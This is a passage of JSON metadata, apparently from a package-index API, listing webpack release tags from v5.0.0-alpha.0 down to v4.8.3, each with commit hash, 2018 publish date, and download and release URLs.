itHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"